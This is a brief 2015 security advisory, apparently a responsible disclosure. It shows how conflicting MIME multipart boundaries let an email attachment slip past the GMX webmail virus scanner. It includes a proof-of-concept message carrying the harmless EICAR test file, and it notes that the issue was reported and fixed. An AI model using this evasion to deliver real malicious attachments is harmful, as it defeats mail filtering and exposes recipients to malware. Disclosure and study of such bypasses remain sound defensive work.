July 2015

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing GMX Virus Scanning using Conflicting MIME Boundaries

The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries. This kind of evasion is in detail described in Dubious MIME - Conflicting Multipart Boundaries.

Proof Of Concept

From: foo To: bar Subject: eicar - conflicting boundaries Mime-Version: 1.0 Content-type: multipart/mixed; boundary=foo Content-type: multipart/mixed; boundary=bar --foo Content-type: text/plain --bar Content-type: application/octet-stream; name=eicar.com Content-Transfer-Encoding: base64 WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo= --bar-- --foo-- GMX Webmail will use the second boundary 'bar' for displaying the mail and for downloads of attachments. This way it provides access to the attached file 'eicar.com' which contains the Eicar test virus. The virus scanner instead will use the first boundary 'foo' and thus will not see the attacht virus. Responsible Disclosure

The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.